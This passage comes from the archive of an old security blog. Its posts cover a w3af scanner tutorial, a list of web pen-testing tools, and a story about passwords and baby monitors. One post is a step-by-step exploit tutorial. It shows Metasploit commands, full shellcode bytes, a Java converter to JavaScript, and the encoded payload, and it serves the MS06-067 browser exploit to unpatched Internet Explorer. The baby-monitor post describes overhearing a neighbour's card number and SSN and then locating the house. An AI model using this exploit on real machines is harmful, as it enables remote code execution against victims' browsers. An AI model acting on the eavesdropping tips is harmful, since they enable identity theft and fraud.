0);">4b52f4ce218c72a18e644f40550b2966767137c9</span><br /><span style="color: rgb(153, 0, 0);">w3af/tools>>></span><br /></pre><br /><br />It also has feature to perform urlencoding and decoding which can come in handy when testing or auditing an application. These commands are simple enough…<br /><pre><br /><span style="color: rgb(153, 0, 0);">w3af/tools>>> run urlencode</span><br /><span style="color: rgb(153, 0, 0);">w3af - urlencoder</span><br /><br /><span style="color: rgb(153, 0, 0);">Options:</span><br /><span style="color: rgb(153, 0, 0);"> -h Print this help message.</span><br /><span style="color: rgb(153, 0, 0);"> -s Characters that should not be encoded, default is / .</span><br /><span style="color: rgb(153, 0, 0);"> -e String to be encoded.</span><br /><br /><span style="color: rgb(153, 0, 0);">Example: urlencode -s &% -e encodeMeNow</span><br /></pre><br /><br /><pre style="color: rgb(153, 0, 0);"><br />w3af/tools>>> run urldecode<br />w3af - urldecoder<br /><br />Options:<br /> -h Print this help message.<br /> -d String to be decoded.<br /><br />Example: urldecode -d decodeMeNow<br />w3af/tools>>><br /></pre><br /><br /><br />That’s all I have so far. Currently working on w3af plugins and should have something ready soon to show. Please add any comments if you may have something to contribute or find any inaccuracies.<br /><br /><br /><br /><br /><br /><table><tbody><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></tbody></table>Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-2410549130005981530.post-31569925339520284732007-10-16T01:51:00.000-05:002008-10-23T23:14:17.549-05:00HeapLib and Shellcode<span style="font-weight: bold;">Overview</span><br />This will be a quick article about using metasploit to generate shellcode. The shell code I will generate will be specific to using HeapLib and the keyframe buffer overflow exploit demonstrated by Alexander Sotirov. You can find out more about Alexander Sotirov's work <a href=https://www.blackhat.com/presentations/bh-europe-07/Sotirov/Whitepaper/bh-eu-07-sotirov-WP.pdf> here</a> and download the source code from the blackhat.com archives <a href=https://www.blackhat.com/presentations/bh-europe-07/Sotirov/Sotirov-Source-Code.zip> here</a>. I will use his source code and add my generated shellcode so that we can execute any command on the windows system when ever a user navigates to the webpage.<br /><br />First off any user attempting to exploit this should know a few things. This exploit has been fixed in the most recent versions of IE and does not work in any other browser than an un-patched IE browser. I use a virtual machine to run all my expliots.<br />Generating Shellcode + NOP Slide<br />To execute this vulnerability we need a nop sled + shellcode of 870 bytes. This is the limit used by HeapLib. Start Metasploit and execute the following commands.<br /><br /><pre style="color: rgb(153, 0, 0);"><br /><span style="color: rgb(102, 0, 0);">msf > use windows/exec</span><br /><span style="color: rgb(102, 0, 0);">msf > use windows/exec</span><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > show options</span><br /><br /><br /><span style="color: rgb(102, 0, 0);">Module options:</span><br /><br /><br /><span style="color: rgb(102, 0, 0);"> Name Current Setting Required Description </span><br /><span style="color: rgb(102, 0, 0);"> ---- --------------- -------- ----------- </span><br /><span style="color: rgb(102, 0, 0);"> CMD yes The command string to execute </span><br /><span style="color: rgb(102, 0, 0);"> EXITFUNC seh yes Exit technique: seh, thread, process </span><br /><br /><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > </span><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > set CMD calc.exe</span><br /><span style="color: rgb(102, 0, 0);">CMD => calc.exe</span><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > set EXITFUNC process</span><br /><span style="color: rgb(102, 0, 0);">EXITFUNC => process</span><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > show options</span><br /><br /><br /><span style="color: rgb(102, 0, 0);">Module options:</span><br /><br /><br /><span style="color: rgb(102, 0, 0);"> Name Current Setting Required Description </span><br /><span style="color: rgb(102, 0, 0);"> ---- --------------- -------- ----------- </span><br /><span style="color: rgb(102, 0, 0);"> CMD calc.exe yes The command string to execute </span><br /><span style="color: rgb(102, 0, 0);"> EXITFUNC process yes Exit technique: seh, thread, process </span><br /></pre><br /><br /><span style="font-weight: bold;">Calculate the Length of the NOP Slide</span><br />To figure out how the length of your NOP slide we will subtract 870 – the length of shellcode.<br />If your just type generate you will be displayed with the length in bytes of the shellcode.<br /><pre><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > generate</span><br /><span style="color: rgb(102, 0, 0);"># windows/exec - 121 bytes</span><br /><span style="color: rgb(102, 0, 0);"># http://www.metasploit.com</span><br /><span style="color: rgb(102, 0, 0);"># EXITFUNC=process, CMD=calc.exe</span><br /><span style="color: rgb(102, 0, 0);">"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +</span><br /><span style="color: rgb(102, 0, 0);">"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +</span><br /><span style="color: rgb(102, 0, 0);">"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +</span><br /><span style="color: rgb(102, 0, 0);">"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +</span><br /><span style="color: rgb(102, 0, 0);">"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +</span><br /><span style="color: rgb(102, 0, 0);">"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +</span><br /><span style="color: rgb(102, 0, 0);">"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +</span><br /><span style="color: rgb(102, 0, 0);">"\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +</span><br /><span style="color: rgb(102, 0, 0);">"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"</span><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > </span><br /><br /></pre><br /><br />So we need a NOP slide of 870 – 121 = 749. The -s option allows us to set a value for a NOP slide to occur before the shellcode and we also need out shellcode to be in javascript. I know that metasploit generates shellcode in java script but there isn't an option that i know of to generate it on the fly. So i wrote a simple java program to to create the javascript from the Java Shellcode. Below is the javascript, anyone attempting my to run this just needs to copy it into a file named toJS.java, change the shell array to your shellcode, and run it. Its really simple to do.<br /><span style="font-weight:bold;"><br />Generate the PayLoad</span><br /><pre><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > generate -s 749 -t java</span><br /><span style="color: rgb(102, 0, 0);">/*</span><br /><span style="color: rgb(102, 0, 0);"> * windows/exec - 870 bytes</span><br /><span style="color: rgb(102, 0, 0);"> * http://www.metasploit.com</span><br /><span style="color: rgb(102, 0, 0);"> * NOP gen: x86/opty2</span><br /><span style="color: rgb(102, 0, 0);"> * EXITFUNC=process, CMD=calc.exe</span><br /><span style="color: rgb(102, 0, 0);"> */</span><br /><span style="color: rgb(102, 0, 0);">byte shell[] = new byte[]</span><br /><span style="color: rgb(102, 0, 0);">{</span><br /><span style="color: rgb(102, 0, 0);"> (byte) 0x7b, (byte) 0x78, (byte) 0x71, (byte) 0x1c, (byte) 0x4b, (byte) 0x66, (byte) 0x42, (byte) 0x86,</span><br /><span style="color: rgb(102, 0, 0);"> (byte) 0xf9, (byte) 0x77, (byte) 0x04, (byte) 0x97, (byte) 0x49, (byte) 0xb2, (byte) 0x91, (byte) 0x0b,</span><br /><span style="color: rgb(102, 0, 0);"> (byte) 0xd5, (byte) 0x72, (byte) 0x7f, (byte) 0x71, (byte) 0x35, (byte) 0x99, (byte) 0xb4, (byte) 0x7d,</span><br /><span style="color: rgb(102, 0, 0);">...</span><br /><span style="color: rgb(102, 0, 0);">...</span><br /><span style="color: rgb(102, 0, 0);">...</span><br /><span style="color: rgb(102, 0, 0);"> 0x8b,</span><br /><span style="color: rgb(102, 0, 0);"> (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83, (byte) 0xc0, (byte) 0x6a, (byte) 0x50,</span><br /><span style="color: rgb(102, 0, 0);"> (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73, (byte) 0x68, (byte) 0x98, (byte) 0xfe,</span><br /><span style="color: rgb(102, 0, 0);"> (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7, (byte) 0x63, (byte) 0x61, (byte) 0x6c,</span><br /><span style="color: rgb(102, 0, 0);"> (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00</span><br /><span style="color: rgb(102, 0, 0);">};</span><br /><span style="color: rgb(102, 0, 0);">msf payload(exec) > </span><br /><br /></pre><br /><br /><span style="font-weight: bold;">Convert Java to JavaScript</span><br /><br />Copy and paste the generated shellcode into my java app. The code is listed below.<br /><span style="color: rgb(0, 0, 102);"><br /><pre><br />public class toJS {<br /><br /><br /><br /> <br /> static int LENGTH=870;<br /><br /> static byte shell[] = new byte[]<br /><br /> {<br /><br /> // your shell code goes here <br /><br /> };<br /><br /> public static void main(String[] args) {<br /><br /> String shell2 = "";<br /><br /> for (int i=0; i< LENGTH; i=i+2)<br /><br /> {<br /><br /> int b1 =((byte) shell[i+1] << 8) & 0x0000ff00;<br /><br /> b1 = b1 | ((byte) shell[i] & 0x000000ff);<br /><br /> String word = Integer.toHexString(b1);<br /><br /> if(word.length()==0)<br /><br /> word = "0000";<br /><br /> else if (word.length() ==1)<br /><br /> word = "000" + word;<br /><br /> else if( word.length() ==2 )<br /><br /> word = "00" + word;<br /><br /> else if( word.length() ==3 )<br /><br /> word = "0" + word;<br /><br /> <br /><br /> shell2 += "%u" + word;<br /><br /> }<br /><br /> System.out.println(shell2);<br /><br /> }<br /><br /><br /><br />}<br /></pre><br /></span><br /><br />Run the following commands and your output should look like the following:<br /><br /><br /><span style="color: rgb(102, 0, 0);">ascetik@ascetik:~$ javac toJS.java </span><br /><span style="color: rgb(102, 0, 0);">ascetik@ascetik:~$ java toJS</span><br /><span style="color: rgb(102, 0, 0);">%ub49f%u91be%u1c35%ud62a%u7d73%u853c%u4ed5%u98b2%u4337%ub549%u7290%u2c04%u0171%u21e3%u28e1%ubbf5%u4905%u8915%u27e0%ub71d%ub497%u3593%ud187%u78eb%ub61c%u19b9%u7df9%u2a3c%u4afc%u6624%ue286%ud56b%ua82f%ube14%u3899%u42d4%u98b2%u7e46%ub03d%u7fb5%u2d70%u9625%u9240%u7441%u760d%u777c%u4e7b%uf811%u679f%u7a47%u1a75%u4ffd%u4334%u0cb3%ud684%u91b1%u4b79%ua937%u48b8%u9bbf%uba3f%u7573%ue300%uba3c%u3fb2%ub3b4%u0276%ub8f5%u3198%u27eb%u71a8%ufe01%uf9c1%u7a73%u9005%u6779%u2d7c%ua92c%u701c%u804e%u29e2%u49e0%u744f%u7d46%u043d%u0c9f%ub6b1%u3796%ud303%uc0ff%ubbd5%u15b5%u4a4b%u1d99%ufc0b%u3a25%u47f8%u0db9%ub741%u7b92%u4824%u2fbf%u3491%ud032%u97fd%u4293%u7ebe%u6677%u7fb0%u7278%u9b35%ue109%u1440%u8143%u7fd6%ue339%u2075%ue0f6%ud428%u7398%u7a04%u1d14%u70be%u477e%u7d7b%u4649%u4fb2%u789f%u742c%u4b05%u850c%ua8fc%u48b8%u3477%ub93c%ub137%u2767%u9015%u4a40%u9296%ue212%ue118%uf80a%u1b41%ud6f7%ua9b4%u2472%u23bb%u9bf9%ufd33%u2d2f%ub33f%u2297%u25eb%uba0d%u7176%u1c79%ub5b0%ub699%u8843%u4ef5%u7c42%ud513%ud43b%ub793%ubf3d%u0891%u35e2%ue383%u7770%u6679%ub891%u2b7a%u4bfc%u7e90%u7376%u787d%u9340%u2714%u1d71%u437c%u309b%u4ee0%u75a9%u0c24%u98b9%ud210%ubff8%u29b7%u37e1%u3c74%u923f%ubb1c%u97b4%u4241%ud469%u2846%ub6d5%u2d2c%u359f%u25be%u4f7f%u3134%u67f9%u9947%u2a96%u04f5%u0549%u7248%uba3d%u4ab2%ub366%ub1b5%u157b%ueb01%ufd0b%ud63b%u2fb0%ua80d%u7a24%ue021%u1970%ud4c0%u8334%u79e1%u6778%u25ba%u2c72%u9f47%u0d97%u4b14%u094f%u46e3%u1d92%uf633%u7ceb%u3566%u9640%u81bf%u2fe2%u3f9b%u157d%ub5a9%u05be%u717b%ua841%ubb27%u3c99%u137f%u1cfc%u7690%u0c74%u8949%u73d6%ub32d%uf90a%u3998%u4ed5%u43b7%u93b2%ub9b1%ufd6b%u4a42%u77b4%ub037%uf887%u3d48%u75b6%u047e%uf585%ub891%u7770%u747b%ufc38%ue186%u4073%u3a7f%u76eb%u7c35%u6671%u88b4%u7de2%ue030%u4b3f%ub22f%ub067%ub846%u0447%u2bb6%ud5d2%u9798%u272d%ub943%ud41b%u18b5%u99f8%u4896%u2c7a%u37be%ufd10%ud020%ue3d1%u914e%u750c%u4178%ud311%u3df9%u1dbb%u797e%u2305%ua8f5%u9b93%u4f92%u729f%u3242%u12e2%u7fd6%u0d72%u90bf%u087c%u15e3%ub3b7%ubab1%u497b%u4a79%u0074%u25e0%u347a%u1470%u1c73%u3c7e%u84a9%uf7c1%u24eb%u4776%u7da8%uf802%u1a71%u24e1%u98be%u9049%u779f%u2d05%u0db6%u0399%ub3f5%u3c4b%u804e%u48d5%ubf67%u43bb%ub89b%ub23f%u7542%u3d1c%u344f%u2537%u78d4%u6904%ub1f9%u462f%u9266%u41b4%u4a93%u22ba%u96fc%u1db7%u27d6%ub90c%u15a9%ub597%u3540%ub02c%u9114%ufcfd%u44e8%u0000%u8b00%u3c45%u7c8b%u7805%uef01%u4f8b%u8b18%u205f%ueb01%u8b49%u8b34%uee01%uc031%uac99%uc084%u0774%ucac1%u010d%uebc2%u3bf4%u2454%u7504%u8be5%u245f%ueb01%u8b66%u4b0c%u5f8b%u011c%u8beb%u8b1c%ueb01%u5c89%u0424%u5fc3%uf631%u5660%u8b64%u3046%u408b%u8b0c%u1c70%u8bad%u0868%uf889%uc083%u506a%uf068%u048a%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065</span><br /><span style="color: rgb(102, 0, 0);">ascetik@ascetik:~$ </span><br /><br /><br /><span style="font-weight: bold;">Putting It All Together</span><br />Open the file ms06-067-keyframe.html in the downloaded source code from the BlackHat Site and replace his shell code with your genereted shellcode. Look for var shellcode. Load it to your server and run and run your unpatched Windows XP IE browser at it and watch your calulator pop up on the screen. YAY your done!<br /><br />Or Just Use Metasploit for Everything<br />You can also use metaploit to automate every thing and let metasploit be your web server too just by doing the following commands:<br /><br /><pre style="color: rgb(102, 0, 0);"><br />msf > use windows/browser/ms06_067_keyframe<br />msf exploit(ms06_067_keyframe) > set URIPATH exploitme<br />URIPATH => exploitme<br />msf exploit(ms06_067_keyframe) > set TARGET 0<br />TARGET => 0<br />msf exploit(ms06_067_keyframe) > set PAYLOAD windows/exec<br />PAYLOAD => windows/exec<br />msf exploit(ms06_067_keyframe) > set CMD calc.exe<br />CMD => calc.exe<br />msf exploit(ms06_067_keyframe) ><br /></pre><br /><br />Now to run the exploit.<br /><br /><pre><br /><span style="color: rgb(102, 0, 0);">msf exploit(ms06_067_keyframe) > exploit</span><br /><span style="color: rgb(102, 0, 0);">[*] Using URL: http://192.168.1.101:8080/exploitme</span><br /><span style="color: rgb(102, 0, 0);">[*] Server started.</span><br /><span style="color: rgb(102, 0, 0);">[*] Exploit running as background job.</span><br /><span style="color: rgb(102, 0, 0);">msf exploit(ms06_067_keyframe) ></span><br /></pre><br /><br />Point your browser to http://192.168.1.101:8080/exploitme and the calculator will run from the browser.<br /><br /><br /><br /><table><tbody><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></tbody></table>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2410549130005981530.post-58813115094746711962007-10-03T12:57:00.000-05:002007-10-05T13:05:34.343-05:00W3AF Tutorial (Part 1)<span style="font-weight: bold;">Overview</span><br /><a href="http://w3af.sourceforge.net/">w3af </a>stands for web auditing and attack framework.I have heard some say that it is the <a href="http://www.metasploit.com/">metasploit </a>for web applications. w3af is basically a free open source web application scanner. w3af has many plugins that are divided into attack, audit, exploit, discovery, evasion, bruteforce, mangle and a few others. The code is well commented and written in python so writing your own exploits and plugins should be trivial but i cannot say for sure since i have not tried as of yet. I will spent more time on this in later articles. This will be the first of many w3af tutorials.<br /><br /><span style="font-weight: bold;">Getting started</span><br />I have installed it on both <a href="http://www.ubuntu.com/">ubuntu fiesty </a>and cygwin for windows. Both installs are relatively painless. Just follow the instructions in the <a href="http://w3af.sourceforge.net/documentation/user/w3afUsersGuide.pdf">w3afUsersGude </a>and you will be fine.<br /><br />Once you have all the prerequisites then you can start w3af as follows:<br /><br />$ ./w3af<br />w3af>>><br /><br />Type help will give you a list of options.<br /><pre><br />w3af>>> help<br />The following commands are available:<br />help You are here. help [command] prints more specific help.<br />url-settings Configure the URL opener.<br />misc-settings Configure w3af misc settings.<br />session Load and save sessions.<br />plugins Enable, disable and configure plugins.<br />start Start site analysis.<br />exploit Exploit a vulnerability.<br />tools Enter the tools section.<br />target Set the target URL.<br />exit Exit w3af.<br />w3af>>><br /></pre><br /><br />First we need to talk about how the interface for w3af is configured. You move forward by typing a given option and back by typing back. Type view to see a list of configurable options and use the set command to change the options. Below we will set the target. This will be the url that we will be auditing.<br /><br /><span style="font-weight: bold;">Configuration:</span><br /><pre><br />w3af>>> target<br />w3af/target>>> help<br />The following commands are available:<br />help You are here. help [command|parameter] prints more specific help.<br />set Set a parameter value.<br />view List all configuration parameters and current values.<br />back Return to previous menu.<br />w3af/target>>> view<br />Parameter Value Description<br />========= ===== ===========<br />target A comma separated list of URLs<br />w3af/target>>> set target http://localhost:8080<br />w3af/target>>> view<br /></pre><br /><br />Now lets configure our plugins.<br /><pre><br />w3af/target>>> back<br />w3af>>> plugins<br />w3af/plugins>>> help<br />The following commands are available:<br />help You are here. help [command] prints more specific help.<br />list List all available plugins.<br />audit Enable and configure audit plugins.<br />bruteforce Enable and configure bruteforce plugins.<br />discovery Enable and configure discovery plugins.<br />evasion Enable and configure evasion plugins.<br />grep Enable and configure grep plugins.<br />mangle Enable and configure mangle plugins.<br />output Enable and configure output plugins.<br />back Return to previous menu.<br /></pre><br /><br />To audit a web application we need at least three plugins configured. Audit, discovery, and output. Typing list plus the plugin will show all available options for the plugin. If you type <b>list audit</b> you will see all the auditing extensions like xss, xsrf, sql injection, ldap injection, etc. Type <b>list discovery</b> will display all discovery options. <br />Just typing the plugin name (i.e <b>audit</b>) will display which options are loaded. By default there are no options configured for any of the plugins. You will have to add them. Some examples would be:<br /><pre> w3af/plugins>>> audit xss,xsrf,sqli </pre> To select a few options to load.<br />or <br /><pre> w3af/plugins>>> audit all </pre> To load all options.<br /><br /><br />I am going to configure our webserver audit to test for Cross site Scripting, typical web server vulnerabilities, and we want it to spider (crawl) the entire site. We also want to save the results into an html audit report. To do this we need to run the following commands:<br /><br /><pre><br />w3af/plugins>>> audit xss<br />w3af/plugins>>> audit<br />Enabled audit plugins:<br />xss<br />w3af/plugins>>> discovery webSpider,pykto,hmap<br />w3af/plugins>>> discovery<br />Enabled discovery plugins:<br />webSpider<br />pykto<br />w3af/plugins>>> output console,htmlFile<br />w3af/plugins>>> output<br />Enabled output plugins:<br />htmlFile<br />console<br />w3af/plugins>>> output config htmlFile<br />w3af/plugin/htmlFile>>> view<br />Parameter Value Description<br />========= ===== ===========<br />verbosity 0 Verbosity level for this plugin.<br />httpFileName output-http.txt File name where this plugin will write HTTP requests and responses<br />reportDebug False True if debug information will be appended to the report.<br />fileName report.html File name where this plugin will write to<br /></pre><br /><br />I have just configured a basic audit with w3af to test for XSS. We initially set the target to be http://localhost/ so it will scan my local apache server. I used pykto which is a perl version of nikto to scan for webserver vulnerabilities. The webSpider plugin will do all the url crawling and create lists of urls to audit. The output plugins will write the results to the command line and the html file called report.html in your application folder. The html output will not be available until the audit is complete. hmap fingerprints the server. The output-http.txt records server requests and responses.<br /><br />Start the audit as follows:<br /><pre><br />w3af/plugin/htmlFile>>> back<br />w3af/plugins>>> back<br />w3af>>> start<br /></pre><br /><br />Be prepared to wait a while for the audit to complete.<br /><pre><br />w3af>>> start<br />Auto-enabling plugin: discovery.allowedMethods<br />Auto-enabling plugin: discovery.error404page<br />Auto-enabling plugin: discovery.serverHeader<br />The Server header for this HTTP server is: Apache/2.2.3 (Ubuntu) PHP/5.2.1<br />Hmap plugin is starting. Fingerprinting may take a while.<br />The most accurate fingerprint for this HTTP server is: Apache/2.0.55 (Ubuntu) PHP/5.1.2<br />pykto plugin is using "Apache/2.0.55 (Ubuntu) PHP/5.1.2" as the remote server type. This information was obtained by hmap plugin.<br />pykto plugin found a vulnerability at URL: http://localhost/icons/ . Vulnerability description: Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used, the /icons directory should be removed. The vulnerability was found in the request with id 128.<br />pykto plugin found a vulnerability at URL: http://localhost/doc/ . Vulnerability description: The /doc directory is browsable. This may be /usr/doc. The vulnerability was found in the request with id 1865.<br />pykto plugin found a vulnerability at URL: http://localhost/\><img%20src=\javascript:alert(document.domain)\><span style="font-size:100%;"> . Vulnerability description: The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02. The vulnerability was found in the request with id 3385.<br />New URL found by discovery: http://localhost/<br />New URL found by discovery: http://localhost/test2.html<br />New URL found by discovery: http://localhost/xst2.html<br />New URL found by discovery: http://localhost/xst.html<br />New URL found by discovery: http://localhost/test.html<br /></pre><br /><br />Here is an example of the results.html<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_acrzuhZS74A/RwRsWKYUXgI/AAAAAAAAAs0/05NwCgcZPBI/s1600-h/w3af+results.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_acrzuhZS74A/RwRsWKYUXgI/AAAAAAAAAs0/05NwCgcZPBI/s320/w3af+results.png" alt="" id="BLOGGER_PHOTO_ID_5117334204599000578" border="0" /></a><br /><br /><br /><br /><table><tbody><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr></tbody></table>Unknownnoreply@blogger.com9tag:blogger.com,1999:blog-2410549130005981530.post-50320364623982973172007-09-25T12:02:00.000-05:002007-10-03T03:06:07.998-05:00Hacking your kidsLets talk about hacking your kids! Yes those small carbon based units that crawl around on the floor, drool, and terrorize the neighbors are actually a data security risk. And its not just a risk to your reputation because little Timmy ran around all day yesterday telling the neighbors about the fight you had with mommy. There are other issues much deeper and far more damaging to your privacy.<br /><br />Here are the security threats I found relevant recently.<br /><span style="font-weight: bold;">Scenario 1 (Your kids are the back door) </span><br />Recently while conducting a pen test of a web application we were able to escalate our privileges and gain access to the entire database though a SQL injection vulnerability. My colleague says "hey this username looks really familiar. I think I know this guy." So we query his password as part of the evidence we need to make our case that SQL injection really is bad. (Upper management does not always agree unless you can give them shock and awe). Once the password is revealed, all is made clear how my colleague knows this user. His wife happens to be involved in a social event where this user's kid also belongs. This particular password is a maneuver the kid performs in a sport he is interested in. It was the combination of the sport plus a significant date in the users life. To make matters worse it was also his kids myspace page screen name!!!! Just knowing a little information about this user would make it relatively easy to gain access to this account. Kids are your life and you can't help talking about them and their interests. This is also why they don't make good passwords!<br /><br /><span style="font-weight: bold;">Scenario 2 (Babies are bugging my house!) </span><br />I know quite alot of people with babies right now. Its my age bracket for sure. They are everywhere! Crawling, drooling, spitting up, and listening for bad habits to pick up on. But one thing that is also common about all people that have babies is baby monitors. And some people never think to turn the base off! Who needs the patriot act when you have wireless communications bleeding into the neighborhood voluntarily. This is the incident that inspired me to write this article. We where listening in on the conversation with the baby monitor and it becomes apparent that this user is talking to his credit card company about a dispute. We are given the cvv, the full number, SSN and his address which should not be hard to find since you know its within a one or 2 house radius. And lets say you don't know the address and you want to find it. Here are the clues.... look for parents with babies, toys in the yard, or pretend to be a Jehovah's Witness and walk door to door. Your friend sitting in the car with the baby monitor will hear the knock on the door and then you will know.<br /><br /><span style="font-weight: bold;">Conclusion</span><br />I know i'm prolly speaking to the choir for anyone actually reading this but here is my advice. Be careful about the information you use to protect your self. Use strong passwords letters numbers and special characters if you can. I like passphrases. They are much harder to guess or brute-force and it makes it easier to remember a 30 character password this way. (i.e. IL1k32B10ggAb0tP3nT3st1n9 ). Try not to use anything as a password that is really important to you. More than likely you talk about it alot and your kid is blogging about it. A little reconnaissance and you are pwnd! Be careful what you say around the baby monitor base. This should be obvious. Anyone within at least a 2 house radius can hear you if they want to.<br /><table><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></table>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-84210899894746685002007-09-23T00:48:00.000-05:002007-10-03T03:06:36.900-05:00Pen Testing Web Applications 101There are several tools that should be in every web application pen testers tool kit. I will spend a little time talking about each of these and what functions they perform. I cannot hope to cover all the topics of Web App Pen Testing in one blog post. This is my essential list of tools that is use. If anyone has any ideas or thinks i may missed anything then please add it to the comments. Id love to know what other people use and think is relevant. If you are new to pen testing web apps then this post should get you started.<br /><br /><span style="font-weight: bold;">FireFox</span><br />My main tool to start pen testing a web application is <a href="http://www.firefox.com/">FireFox,</a> loaded down with a ton of extensions. You have to interact with the application as a user and not just turn your favorite scanner loose on it. I have never found anything with a scanner that i would not have found by manually testing the application. I have, however, found many more vulnerabilities that the scanners could never dream of. My list of extensions follows:<br /><ol><li><a href="https://addons.mozilla.org/en-US/firefox/addon/966">TamperData</a> - Its a quick and dirty local proxy that allows you to intercept requests and modify them before submitting them to the server.<br /></li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/60">WebDeveloper</a> Tool Bar - Essential. Allows you quick access to view page source, see form details, display and modify hidden fields, etc.<br /></li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/573">Add N Edit Cookies</a> - Great for cookie poisoning... it allows you to edit cookies. Nuff said.</li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/590">ShowIP-</a> Displays the ip address of the server you are connected to as well as hot links to tools on dnsStuff.com.<br /></li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/2464">FoxyProxy</a> - Allows you to switch proxies on the fly or by pattern. I don't know what i would do with out this. I use it to switch between my corp proxy at work and home, WebScarab or Burp, create patterns so that the site i'm testing always goes though WebScarab but any other site goes direct.</li></ol><span style="font-weight: bold;">Proxies</span><span><br />A local proxy is essential for testing any web application. These allow you to perform a Man In the Middle attack on your own browser session. This is useful in bypassing client side validations like limiting the number of characters in an inputbox or javasctipt that checks for numeric only characters. These also allow you to poison cookies, change GET to POST, tamper with the Headers, add POST parameters, modify hidden fields, any part of the http request can be modified before submitting it to the server. Below is a list of proxies i prefer.<br /></span><ol><li><a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project#Project_Contributors">WebScarab</a> - allows importing of WSDL's for fuzzing web services, spider functionality , manual requests, and session id analysis, encoding/decoding features.<br /></li><li><a href="http://portswigger.net/suite/">Burp Suite</a> - spider functionality, replay requests, fuzzing features.<br /></li><li><a href="https://addons.mozilla.org/en-US/firefox/addon/966">TamperData</a> - more limited of the 3 but has some great features. Do not have to change your proxy setting to use it, has XSS and SQL injection presets, encoding/decoding features. Does not have functionality to modify raw http requests.<br /></li></ol><span style="font-weight: bold;">Other OpenSource Tools</span><br /><ol><li><a href="http://www.cirt.net/code/nikto.shtml">Nikto</a> - Looks for vulnerabilities in web servers.<br /></li><li><a href="http://w3af.sourceforge.net/">w3af</a> - Web Attack and Auditing Framework. Im still testing this out at the moment. It provides checks for common web application vulnerabilities like SQL injection, XSS, url guessing, etc and generates an html report on the findings.<br /></li><li><a href="http://netcat.sourceforge.net/">netcat</a> - a networking utility to read and write data to network connections.<br /></li></ol><a href="http://en.wikipedia.org/wiki/Brain"><span style="font-weight: bold;">Gray Matter</span></a><br />This is the most important tool. Really understand how the application is built and what technologies it employs. Understand the authorization model, what type of data does the application handle, how is it stored, who has access to the data, what are all the possible entry points into the application (i.e. flat files, external databases, JMS...), what is the 